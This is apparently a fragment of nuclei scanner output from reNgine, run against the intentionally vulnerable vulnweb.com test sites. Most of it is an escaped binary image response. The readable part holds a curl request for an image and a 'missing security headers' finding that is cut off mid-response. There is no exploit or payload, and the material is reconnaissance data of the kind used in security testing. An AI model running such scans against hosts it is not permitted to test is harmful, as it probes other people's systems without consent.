\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:49.962206046Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" 